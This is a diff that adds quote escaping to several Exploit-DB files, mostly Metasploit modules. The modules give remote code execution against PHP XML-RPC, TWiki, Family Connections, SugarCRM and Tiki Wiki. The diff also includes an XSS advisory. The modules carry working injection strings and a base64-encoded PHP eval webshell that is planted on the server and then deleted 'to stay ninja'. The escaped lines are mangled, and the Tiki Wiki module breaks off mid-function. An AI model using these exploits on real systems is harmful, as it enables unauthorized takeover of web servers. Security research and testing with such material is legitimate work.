+++ b/platforms/php/webapps/16882.rb
@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@ -19,79 +19,79 @@ class Metasploit3 < Msf::Exploit::Remote
 	# XXX This module needs an overhaul
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'PHP XML-RPC Arbitrary Code Execution',
+			\'Name\'           => \'PHP XML-RPC Arbitrary Code Execution\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 					This module exploits an arbitrary code execution flaw
 				discovered in many implementations of the PHP XML-RPC module.
 				This flaw is exploitable through a number of PHP web
 				applications, including but not limited to Drupal, Wordpress,
 				Postnuke, and TikiWiki.
 			},
-			'Author'         => [ 'hdm', 'cazz' ],
+			\'Author\'         => [ \'hdm\', \'cazz\' ],
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9929 $',
+			\'Version\'        => \'$Revision: 9929 $\',
-			'References'     =>
+			\'References\'     =>
 				[
-					['CVE', '2005-1921'],
+					[\'CVE\', \'2005-1921\'],
-					['OSVDB', '17793'],
+					[\'OSVDB\', \'17793\'],
-					['BID', '14088'],
+					[\'BID\', \'14088\'],
 				],
-			'Privileged'     => false,
+			\'Privileged\'     => false,
-			'Platform'       => ['unix', 'solaris'],
+			\'Platform\'       => [\'unix\', \'solaris\'],
-			'Payload'        => {
+			\'Payload\'        => {
-					'Space' => 512,
+					\'Space\' => 512,
-					'DisableNops' => true,
+					\'DisableNops\' => true,
-					'Keys'  => ['cmd', 'cmd_bash'],
+					\'Keys\'  => [\'cmd\', \'cmd_bash\'],
 				},
-			'Targets'        => [ ['Automatic', { }], ],
+			\'Targets\'        => [ [\'Automatic\', { }], ],
-			'DefaultTarget' => 0,
+			\'DefaultTarget\' => 0,
-			'DisclosureDate' => 'Jun 29 2005'
+			\'DisclosureDate\' => \'Jun 29 2005\'
 			))
 		register_options(
 			[
-				OptString.new('PATH', [ true,  "Path to xmlrpc.php", '/xmlrpc.php']),
+				OptString.new(\'PATH\', [ true,  \"Path to xmlrpc.php\", \'/xmlrpc.php\']),
 			], self.class)
 		deregister_options(
-			'HTTP::junk_params', # not your typical POST, so don't inject params.
+			\'HTTP::junk_params\', # not your typical POST, so don\'t inject params.
-			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
+			\'HTTP::junk_slashes\' # For some reason junk_slashes doesn\'t always work, so turn that off for now.
 			)
 	end
 	def go(command)
-		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
+		encoded = command.unpack(\"C*\").collect{|x| \"chr(#{x})\"}.join(\'.\')
 		wrapper = rand_text_alphanumeric(rand(128)+32)
-		cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
+		cmd = \"echo(\'#{wrapper}\'); passthru(#{ encoded }); echo(\'#{wrapper}\');;\"
 		xml =
-		'<?xml version="1.0"?>' +
+		\'<?xml version=\"1.0\"?>\' +
-		"<methodCall>" +
+		\"<methodCall>\" +
-			"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
+			\"<methodName>\"+ rand_text_alphanumeric(rand(128)+32) + \"</methodName>\" +
-			"<params><param>" +
+			\"<params><param>\" +
-				"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
+				\"<name>\" + rand_text_alphanumeric(rand(128)+32) + \"\');#{cmd}//</name>\" +
-				"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
+				\"<value>\" + rand_text_alphanumeric(rand(128)+32) + \"</value>\" +
-			"</param></params>" +
+			\"</param></params>\" +
-		"</methodCall>";
+		\"</methodCall>\";
 		res = send_request_cgi({
-				'uri'          => datastore['PATH'],
+				\'uri\'          => datastore[\'PATH\'],
-				'method'       => 'POST',
+				\'method\'       => \'POST\',
-				'ctype'        => 'application/xml',
+				\'ctype\'        => \'application/xml\',
-				'data'         => xml,
+				\'data\'         => xml,
 			}, 5)
 		if (res and res.body)
 			b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
 			if b
 				return b.captures[0]
-			elsif datastore['HTTP::chunked'] == true
+			elsif datastore[\'HTTP::chunked\'] == true
 				b = /chunked Transfer-Encoding forbidden/.match(res.body)
 				if b
-					raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
+					raise RuntimeError, \'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.\'
 				end
 			end
 		end
@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 	def check
-		response = go("echo ownable")
+		response = go(\"echo ownable\")
 		if (!response.nil? and response =~ /ownable/sm)
 			return Exploit::CheckCode::Vulnerable
 		end
@ -110,12 +110,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		response = go(payload.encoded)
 		if response == nil
-			print_error('exploit failed: no response')
+			print_error(\'exploit failed: no response\')
 		else
 			if response.length == 0
-				print_status('exploit successful')
+				print_status(\'exploit successful\')
 			else
-				print_status("Command returned #{response}")
+				print_status(\"Command returned #{response}\")
 			end
 			handler
 		end
--- a/platforms/php/webapps/16894.rb
+++ b/platforms/php/webapps/16894.rb
@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@ -18,42 +18,42 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'TWiki Search Function Arbitrary Command Execution',
+			\'Name\'           => \'TWiki Search Function Arbitrary Command Execution\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 					This module exploits a vulnerability in the search component of TWiki.
-				By passing a 'search' parameter containing shell metacharacters to the
+				By passing a \'search\' parameter containing shell metacharacters to the
-				'WebSearch' script, an attacker can execute arbitrary OS commands.
+				\'WebSearch\' script, an attacker can execute arbitrary OS commands.
 			},
-			'Author'         =>
+			\'Author\'         =>
 				[
 					# Unknown - original discovery
-					'jduck'       # metasploit version
+					\'jduck\'       # metasploit version
 				],
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9671 $',
+			\'Version\'        => \'$Revision: 9671 $\',
-			'References'     =>
+			\'References\'     =>
 				[
-					[ 'CVE', '2004-1037' ],
+					[ \'CVE\', \'2004-1037\' ],
-					[ 'OSVDB', '11714' ],
+					[ \'OSVDB\', \'11714\' ],
-					[ 'BID', '11674' ],
+					[ \'BID\', \'11674\' ],
-					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
+					[ \'URL\', \'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch\' ]
 				],
-			'Privileged'     => true, # web server context
+			\'Privileged\'     => true, # web server context
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'DisableNops' => true,
+					\'DisableNops\' => true,
-					'BadChars'    => ' ',
+					\'BadChars\'    => \' \',
-					'Space'       => 1024,
+					\'Space\'       => 1024,
 				},
-			'Platform'       => [ 'unix' ],
+			\'Platform\'       => [ \'unix\' ],
-			'Arch'           => ARCH_CMD,
+			\'Arch\'           => ARCH_CMD,
-			'Targets'        => [[ 'Automatic', { }]],
+			\'Targets\'        => [[ \'Automatic\', { }]],
-			'DisclosureDate' => 'Oct 01 2004',
+			\'DisclosureDate\' => \'Oct 01 2004\',
-			'DefaultTarget'  => 0))
+			\'DefaultTarget\'  => 0))
 		register_options(
 			[
-				OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
+				OptString.new(\'URI\', [ true, \"TWiki bin directory path\", \"/twiki/bin\" ]),
 			], self.class)
 	end
@ -61,23 +61,23 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		content = rand_text_alphanumeric(16+rand(16))
 		test_file = rand_text_alphanumeric(8+rand(8))
-		cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
+		cmd_base = datastore[\'URI\'] + \'/view/Main/WebSearch?search=\'
-		test_url = datastore['URI'] + '/view/Main/' + test_file
+		test_url = datastore[\'URI\'] + \'/view/Main/\' + test_file
-		# first see if it already exists (it really shouldn't)
+		# first see if it already exists (it really shouldn\'t)
 		res = send_request_raw({
-				'uri' => test_url
+				\'uri\' => test_url
 			}, 25)
 		if (not res) or (res.body.match(content))
-			print_error("WARNING: The test file exists already!")
+			print_error(\"WARNING: The test file exists already!\")
 			return Exploit::CheckCode::Safe
 		end
 		# try to create it
-		print_status("Attempting to create #{test_url} ...")
+		print_status(\"Attempting to create #{test_url} ...\")
-		search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
+		search = rand_text_numeric(1+rand(5)) + \"\\\';echo${IFS}\" + content + \"${IFS}>\" + test_file + \".txt;#\\\'\"
 		res = send_request_raw({
-				'uri' => cmd_base + Rex::Text.uri_encode(search)
+				\'uri\' => cmd_base + Rex::Text.uri_encode(search)
 			}, 25)
 		if (not res) or (res.code != 200)
 			return Exploit::CheckCode::Safe
@ -85,20 +85,20 @@ class Metasploit3 < Msf::Exploit::Remote
 		# try to run it, 500 code == successfully made it
 		res = send_request_raw({
-				'uri' => test_url
+				\'uri\' => test_url
 			}, 25)
 		if (not res) or (not res.body.match(content))
 			return Exploit::CheckCode::Safe
 		end
 		# delete the tmp file
-		print_status("Attempting to delete #{test_url} ...")
+		print_status(\"Attempting to delete #{test_url} ...\")
-		search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
+		search = rand_text_numeric(1+rand(5)) + \"\\\';rm${IFS}-f${IFS}\" + test_file + \".txt;#\\\'\"
 		res = send_request_raw({
-				'uri' => cmd_base + Rex::Text.uri_encode(search)
+				\'uri\' => cmd_base + Rex::Text.uri_encode(search)
 			}, 25)
 		if (not res) or (res.code != 200)
-			print_error("WARNING: unable to remove test file (#{test_file})")
+			print_error(\"WARNING: unable to remove test file (#{test_file})\")
 		end
 		return Exploit::CheckCode::Vulnerable
@ -108,21 +108,21 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		search = rand_text_alphanumeric(1+rand(8))
-		search << "';" + payload.encoded + ";#\'"
+		search << \"\';\" + payload.encoded + \";#\\\'\"
-		query_str = datastore['URI'] + '/view/Main/WebSearch'
+		query_str = datastore[\'URI\'] + \'/view/Main/WebSearch\'
-		query_str << '?search='
+		query_str << \'?search=\'
 		query_str << Rex::Text.uri_encode(search)
 		res = send_request_cgi({
-				'method'    => 'GET',
+				\'method\'    => \'GET\',
-				'uri'	      => query_str,
+				\'uri\'	      => query_str,
 			}, 25)
 		if (res and res.code == 200)
-			print_status("Successfully sent exploit request")
+			print_status(\"Successfully sent exploit request\")
 		else
-			raise RuntimeError, "Error sending exploit request"
+			raise RuntimeError, \"Error sending exploit request\"
 		end
 		handler
--- a/platforms/php/webapps/18208.rb
+++ b/platforms/php/webapps/18208.rb
@ -5,7 +5,7 @@
 # http://metasploit.com/framework/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@ -14,57 +14,57 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info={})
 		super(update_info(info,
-			'Name'           => 'Family Connections less.php Remote Command Execution',
+			\'Name\'           => \'Family Connections less.php Remote Command Execution\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 				This module exploits an arbitrary command execution vulnerability in
-				Family Connections 2.7.1. It's in the dev/less.php script and is due
+				Family Connections 2.7.1. It\'s in the dev/less.php script and is due
-				to an insecure use of system().  Authentication isn't required to exploit
+				to an insecure use of system().  Authentication isn\'t required to exploit
 				the vulnerability but register_globals must be set to On.
 			},
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Author'         =>
+			\'Author\'         =>
 				[
-					'mr_me <steventhomasseeley[at]gmail.com>', # Vulnerability discovery and exploit
+					\'mr_me <steventhomasseeley[at]gmail.com>\', # Vulnerability discovery and exploit
-					'juan vazquez'  # Metasploit module
+					\'juan vazquez\'  # Metasploit module
 				],
-			'References'     =>
+			\'References\'     =>
 				[
-					[ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
+					[ \'URL\', \'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/\' ],
-					[ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
+					[ \'URL\', \'http://sourceforge.net/apps/trac/fam-connections/ticket/407\' ],
-					[ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],
+					[ \'URL\', \'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html\' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/18198/' ]
+					[ \'URL\', \'http://www.exploit-db.com/exploits/18198/\' ]
 				],
-			'Privileged'     => false,
+			\'Privileged\'     => false,
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Compat'     =>
+					\'Compat\'     =>
 					{
-						'PayloadType'  => 'cmd',
+						\'PayloadType\'  => \'cmd\',
-						'RequiredCmd'  => 'generic telnet perl ruby',
+						\'RequiredCmd\'  => \'generic telnet perl ruby\',
 					}
 				},
-			'Platform'       => ['unix', 'linux'],
+			\'Platform\'       => [\'unix\', \'linux\'],
-			'Arch'           => ARCH_CMD,
+			\'Arch\'           => ARCH_CMD,
-			'Targets'        => [['Automatic',{}]],
+			\'Targets\'        => [[\'Automatic\',{}]],
-			'DisclosureDate' => 'Nov 29 2011',
+			\'DisclosureDate\' => \'Nov 29 2011\',
-			'DefaultTarget'  => 0
+			\'DefaultTarget\'  => 0
 		))
 		register_options(
 			[
-				OptString.new('URI', [true, "The path to the Family Connections main site", "/fcms/"]),
+				OptString.new(\'URI\', [true, \"The path to the Family Connections main site\", \"/fcms/\"]),
 			],self.class)
 	end
 	def check
-		uri = datastore['URI']
+		uri = datastore[\'URI\']
-		uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
+		uri += (datastore[\'URI\'][-1, 1] == \"/\") ? \"dev/less.php\" : \"/dev/less.php\"
 		mark = Rex::Text.rand_text_alpha(rand(5) + 5)
 		res = send_request_cgi({
-			'uri'       => uri,
+			\'uri\'       => uri,
-			'vars_get'  => { 'argv[1]' => "|echo #{mark};#" }
+			\'vars_get\'  => { \'argv[1]\' => \"|echo #{mark};#\" }
 		}, 25)
 		if res and res.code == 200 and res.body =~ /#{mark}/
@ -75,23 +75,23 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 	def exploit
-		uri = datastore['URI']
+		uri = datastore[\'URI\']
-		uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
+		uri += (datastore[\'URI\'][-1, 1] == \"/\") ? \"dev/less.php\" : \"/dev/less.php\"
 		start_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
 		end_mark  = Rex::Text.rand_text_alpha(rand(5) + 5)
-		custom_payload = "|echo #{start_mark};#{payload.encoded};echo #{end_mark};#"
+		custom_payload = \"|echo #{start_mark};#{payload.encoded};echo #{end_mark};#\"
 		res = send_request_cgi({
-			'uri'       => uri,
+			\'uri\'       => uri,
-			'vars_get'  => { 'argv[1]' => custom_payload }
+			\'vars_get\'  => { \'argv[1]\' => custom_payload }
 		}, 25)
 		if res and res.code == 200 and res.body =~ /#{start_mark}/
 			# Prints output when using cmd/unix/generic
 			result = res.body.split(/#{start_mark}/)[1].split(/#{end_mark}/)[0]
 			if not result.strip.empty?
-				print_status("Result of the command:\n#{result}")
+				print_status(\"Result of the command:\\n#{result}\")
 			end
 		end
 	end
--- a/platforms/php/webapps/18230.txt
+++ b/platforms/php/webapps/18230.txt
@ -21,29 +21,29 @@ Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Co
         page : messageboard.php?thread=1	
-	 decription: if you ADD javascript code in " reply " field , the code will execute in " profile.php?member=1 " page.
+	 decription: if you ADD javascript code in \" reply \" field , the code will execute in \" profile.php?member=1 \" page.
 	page : familynews.php?addnews=yes
-	description : when you add news you can put js in " text area " field to execute
+	description : when you add news you can put js in \" text area \" field to execute
 	page : prayers.php
-	description : when you add prayer  ,you can inject js in "pray for" field as "<script>alert(/xss/)</script>"
+	description : when you add prayer  ,you can inject js in \"pray for\" field as \"<script>alert(/xss/)</script>\"
 	page : recipes.php?add=category
-	description : insert in "name" field  "><script>alert(/xss/)</script> , it will execute at "recipes.php?addrecipe=yes" page
+	description : insert in \"name\" field  \"><script>alert(/xss/)</script> , it will execute at \"recipes.php?addrecipe=yes\" page
 	page : calendar.php?add=2011-12-2
-	description : when add an event, insert in "Event" field ("<script>alert(/xss/)</script>")
+	description : when add an event, insert in \"Event\" field (\"<script>alert(/xss/)</script>\")
-	it will execute at  "calendar.php" page
+	it will execute at  \"calendar.php\" page
 	################################Reflected XSS#################################################################################
--- a/platforms/php/webapps/19403.rb
+++ b/platforms/php/webapps/19403.rb
@ -5,7 +5,7 @@
 #   http://metasploit.com/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@ -14,141 +14,141 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'SugarCRM <= 6.3.1 unserialize() PHP Code Execution',
+			\'Name\'           => \'SugarCRM <= 6.3.1 unserialize() PHP Code Execution\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 					This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1
 				which could be abused to allow authenticated SugarCRM users to execute arbitrary
 				code with the permissions of the webserver.
-				The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php'
+				The dangerous unserialize() exists in the \'include/MVC/View/views/view.list.php\'
-				script, which is called with user controlled data from the 'current_query_by_page'
+				script, which is called with user controlled data from the \'current_query_by_page\'
 				parameter. The exploit abuses the __destruct() method from the SugarTheme class
-				to write arbitrary PHP code to a 'pathCache.php' on the web root.
+				to write arbitrary PHP code to a \'pathCache.php\' on the web root.
 			},
-			'Author'	=>
+			\'Author\'	=>
 				[
-					'EgiX', # Vulnerability discovery and PoC
+					\'EgiX\', # Vulnerability discovery and PoC
-					'juan vazquez', # Metasploit module
+					\'juan vazquez\', # Metasploit module
-					'sinn3r' # Metasploit module
+					\'sinn3r\' # Metasploit module
 				],
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
+			\'Version\'        => \'$Revision$\',
-			'References'     =>
+			\'References\'     =>
 				[
-					[ 'CVE', '2012-0694' ],
+					[ \'CVE\', \'2012-0694\' ],
-					[ 'EDB', '19381' ],
+					[ \'EDB\', \'19381\' ],
-					[ 'URL', 'http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/' ]
+					[ \'URL\', \'http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/\' ]
 				],
-			'Privileged'     => false,
+			\'Privileged\'     => false,
-			'Platform'       => ['php'],
+			\'Platform\'       => [\'php\'],
-			'Arch'           => ARCH_PHP,
+			\'Arch\'           => ARCH_PHP,
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'DisableNops' => true,
+					\'DisableNops\' => true,
 				},
-			'Targets'        => [ ['Automatic', { }], ],
+			\'Targets\'        => [ [\'Automatic\', { }], ],
-			'DefaultTarget'  => 0,
+			\'DefaultTarget\'  => 0,
-			'DisclosureDate' => 'Jun 23 2012'
+			\'DisclosureDate\' => \'Jun 23 2012\'
 			))
 			register_options(
 				[
-					OptString.new('TARGETURI',	[ true, "The base path to the web application", "/sugarcrm/"]),
+					OptString.new(\'TARGETURI\',	[ true, \"The base path to the web application\", \"/sugarcrm/\"]),
-					OptString.new('USERNAME', [true, "The username to authenticate with" ]),
+					OptString.new(\'USERNAME\', [true, \"The username to authenticate with\" ]),
-					OptString.new('PASSWORD', [true, "The password to authenticate with" ])
+					OptString.new(\'PASSWORD\', [true, \"The password to authenticate with\" ])
 				], self.class)
 	end
 	def on_new_session(client)
-		if client.type == "meterpreter"
+		if client.type == \"meterpreter\"
-			f = "pathCache.php"
+			f = \"pathCache.php\"
-			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+			client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")
 			begin
 				client.fs.file.rm(f)
-				print_good("#{@peer} - #{f} removed to stay ninja")
+				print_good(\"#{@peer} - #{f} removed to stay ninja\")
 			rescue
-				print_error("#{@peer} - Unable to remove #{f}")
+				print_error(\"#{@peer} - Unable to remove #{f}\")
 			end
 		end
 	end
 	def exploit
 		base = target_uri.path
-		base << '/' if base[-1, 1] != '/'
+		base << \'/\' if base[-1, 1] != \'/\'
-		@peer = "#{rhost}:#{rport}"
+		@peer = \"#{rhost}:#{rport}\"
-		username = datastore['USERNAME']
+		username = datastore[\'USERNAME\']
-		password = datastore['PASSWORD']
+		password = datastore[\'PASSWORD\']
-		# Can't use vars_post because it'll escape "_"
+		# Can\'t use vars_post because it\'ll escape \"_\"
-		data = "module=Users&"
+		data = \"module=Users&\"
-		data << "action=Authenticate&"
+		data << \"action=Authenticate&\"
-		data << "user_name=#{username}&"
+		data << \"user_name=#{username}&\"
-		data << "user_password=#{password}"
+		data << \"user_password=#{password}\"
 		res = send_request_cgi(
 		{
-			'uri'    => "#{base}index.php" ,
+			\'uri\'    => \"#{base}index.php\" ,
-			'method' => "POST",
+			\'method\' => \"POST\",
-			'headers'   =>
+			\'headers\'   =>
 				{
-					'Cookie'  => "PHPSESSID=1",
+					\'Cookie\'  => \"PHPSESSID=1\",
 				},
-			'data'   => data
+			\'data\'   => data
 		})
-		if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
+		if not res or res.headers[\'Location\'] =~ /action=Login/ or not res.headers[\'Set-Cookie\']
-			print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
+			print_error(\"#{@peer} - Login failed with \\\"#{username}:#{password}\\\"\")
 			return
 		end
-		if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
+		if res.headers[\'Set-Cookie\'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
 			session_id = $1
 		else
-			print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
+			print_error(\"#{@peer} - Login failed with \\\"#{username}:#{password}\\\" (No session ID)\")
 			return
 		end
-		print_status("#{@peer} - Login successful with #{username}:#{password}")
+		print_status(\"#{@peer} - Login successful with #{username}:#{password}\")
-		data = "module=Contacts&"
+		data = \"module=Contacts&\"
-		data << "Contacts2_CONTACT_offset=1&"
+		data << \"Contacts2_CONTACT_offset=1&\"
-		data << "current_query_by_page="
+		data << \"current_query_by_page=\"
-		#O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
+		#O:10:\"SugarTheme\":2:{s:10:\"*dirName\";s:5:\"../..\";s:20:\"SugarTheme_jsCache\";s:49:\"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>\";}
-		data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
+		data << \"TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=\"
-		print_status("#{@peer} - Exploiting the unserialize()")
+		print_status(\"#{@peer} - Exploiting the unserialize()\")
 		res = send_request_cgi(
 		{
-			'uri' => "#{base}index.php",
+			\'uri\' => \"#{base}index.php\",
-			'method' => 'POST',
+			\'method\' => \'POST\',
-			'headers'   =>
+			\'headers\'   =>
 			{
-				'Cookie'  => "PHPSESSID=#{session_id};",
+				\'Cookie\'  => \"PHPSESSID=#{session_id};\",
 			},
-			'data' => data
+			\'data\' => data
 		})
 		if not res or res.code != 200
-			print_error("#{@peer} - Exploit failed: #{res.code}")
+			print_error(\"#{@peer} - Exploit failed: #{res.code}\")
 			return
 		end
-		print_status("#{@peer} - Executing the payload")
+		print_status(\"#{@peer} - Executing the payload\")
 		res = send_request_cgi(
 		{
-			'method' => 'GET',
+			\'method\' => \'GET\',
-			'uri'    => "#{base}pathCache.php",
+			\'uri\'    => \"#{base}pathCache.php\",
-			'headers' => {
+			\'headers\' => {
-				'Cmd' => Rex::Text.encode_base64(payload.encoded)
+				\'Cmd\' => Rex::Text.encode_base64(payload.encoded)
 			}
 		})
 		if res
-			print_error("#{@peer} - Payload execution failed: #{res.code}")
+			print_error(\"#{@peer} - Payload execution failed: #{res.code}\")
 			return
 		end
--- a/platforms/php/webapps/19630.rb
+++ b/platforms/php/webapps/19630.rb
@ -5,7 +5,7 @@
 #   http://metasploit.com/
 ##
-require 'msf/core'
+require \'msf/core\'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@ -14,14 +14,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Tiki Wiki <= 8.3 unserialize() PHP Code Execution',
+			\'Name\'           => \'Tiki Wiki <= 8.3 unserialize() PHP Code Execution\',
-			'Description'    => %q{
+			\'Description\'    => %q{
 					This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3
 				which could be abused to allow unauthenticated users to execute arbitrary code
 				under the context of the webserver user.
-				The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script,
+				The dangerous unserialize() exists in the \'tiki-print_multi_pages.php\' script,
-				which is called with user controlled data from the 'printpages' parameter.
+				which is called with user controlled data from the \'printpages\' parameter.
 				The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy
 				class to write arbitrary PHP code to a file on the Tiki Wiki web directory.
@ -31,111 +31,111 @@ class Metasploit3 < Msf::Exploit::Remote
 				version older than 5.3.4 must be used to allow poison null bytes in filesystem related
 				functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.
 			},
-			'Author'	=>
+			\'Author\'	=>
 				[
-					'EgiX', # Vulnerability discovery and PoC
+					\'EgiX\', # Vulnerability discovery and PoC
-					'juan vazquez' # Metasploit module
+					\'juan vazquez\' # Metasploit module
 				],
-			'License'        => MSF_LICENSE,
+			\'License\'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
+			\'Version\'        => \'$Revision$\',
-			'References'     =>
+			\'References\'     =>
 				[
-					[ 'CVE', '2012-0911' ],
+					[ \'CVE\', \'2012-0911\' ],
-					[ 'BID', '54298' ],
+					[ \'BID\', \'54298\' ],
-					[ 'EDB', '19573' ],
+					[ \'EDB\', \'19573\' ],
-					[ 'URL', 'http://dev.tiki.org/item4109' ]
+					[ \'URL\', \'http://dev.tiki.org/item4109\' ]
 				],
-			'Privileged'     => false,
+			\'Privileged\'     => false,
-			'Platform'       => ['php'],
+			\'Platform\'       => [\'php\'],
-			'Arch'           => ARCH_PHP,
+			\'Arch\'           => ARCH_PHP,
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'DisableNops' => true,
+					\'DisableNops\' => true,
 				},
-			'Targets'        => [ ['Automatic', {}] ],
+			\'Targets\'        => [ [\'Automatic\', {}] ],
-			'DefaultTarget'  => 0,
+			\'DefaultTarget\'  => 0,
-			'DisclosureDate' => 'Jul 04 2012'
+			\'DisclosureDate\' => \'Jul 04 2012\'
 			))
 			register_options(
 				[
-					OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"])
+					OptString.new(\'TARGETURI\', [ true, \"The base path to the web application\", \"/tiki/\"])
 				], self.class)
 	end
 	def on_new_session(client)
-		if client.type == "meterpreter"
+		if client.type == \"meterpreter\"
-			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+			client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")
 			begin
 				client.fs.file.rm(@upload_php)
-				print_good("#{@peer} - #{@upload_php} removed to stay ninja")
+				print_good(\"#{@peer} - #{@upload_php} removed to stay ninja\")
 			rescue
-				print_error("#{@peer} - Unable to remove #{f}")
+				print_error(\"#{@peer} - Unable to remove #{f}\")
 			end
 		end
 	end
 	def exploit
 		base = target_uri.path
-		base << '/' if base[-1, 1] != '/'
+		base << \'/\' if base[-1, 1] != \'/\'
-		@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
+		@upload_php = rand_text_alpha(rand(4) + 4) + \".php\"
-		@peer = "#{rhost}:#{rport}"
+		@peer = \"#{rhost}:#{rport}\"
-		print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
+		print_status(\"#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem\")
 		res = send_request_cgi(
-			'uri' => "#{base}tiki-rss_error.php"
+			\'uri\' => \"#{base}tiki-rss_error.php\"
 		)
-		if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/
+		if not res or res.code != 200 or not res.body =~ /[> ](\\/.*)tiki-rss_error\\.php/
